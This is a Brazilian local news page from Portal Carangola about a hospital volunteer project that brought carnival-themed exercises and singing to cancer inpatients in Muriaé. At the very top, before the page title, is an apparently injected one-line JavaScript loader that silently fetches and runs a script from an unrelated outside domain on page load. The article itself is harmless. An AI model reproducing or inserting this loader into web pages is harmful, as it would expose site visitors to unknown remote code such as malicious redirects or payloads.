;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Primeira edição do Projeto Despertando Sorrisos de 2017 leva alegria aos pacientes do Hospital com ritmo de carnaval. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Primeira edição do Projeto Despertando Sorrisos de 2017 leva alegria aos pacientes do Hospital com ritmo de carnaval.

Despertando Sorrisos “Porque viver sem sorrir não tem a menor graça”

Na tarde desta quinta-feira, 23 de fevereiro, na área de convivência da Unidade de Internação Clinica do Hospital do Câncer de Muriaé da Fundação Cristiano Varella aconteceu a primeira atividade do ano de 2017 do Projeto Despertando Sorrisos “Porque viver sem sorrir não tem a menor graça”.
Idealizado pela Enfermeira Juliana Campos Cândido, como plano de ação da sua avaliação de desempenho e apoiado pela Coordenadora da unidade, Luciana de Freitas Souza, contando com o envolvimento e participação de um grupo de colaboradores de vários setores da instituição e voluntários, o projeto veio com o objetivo de levar um pouco mais de alegria e distração para o dia a dia dos pacientes e acompanhantes que permanecem na unidade , contribuindo para um  maior envolvimento e integração de toda equipe oferecendo um cuidado diferenciado.
O desafio da equipe era criar um ambiente mais leve, alegre e descontraído para os pacientes, familiares e profissionais. E em ritmo de carnaval, a fisioterapeuta Terlânia Andrade, realizou algumas atividades físicas em grupo. E a cada exercício realizado, o coral composto por três enfermeiras e um auxiliar administrativo animou o momento cantando marchinhas de carnaval.

 

O Projeto, que acontecerá uma vez por mês, contribui com um ambiente mais agradável para os pacientes, acompanhantes e profissionais, estimulando a auto estima, levando humanização, amor, alegria e reforçando a importância dos cuidados paliativos.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.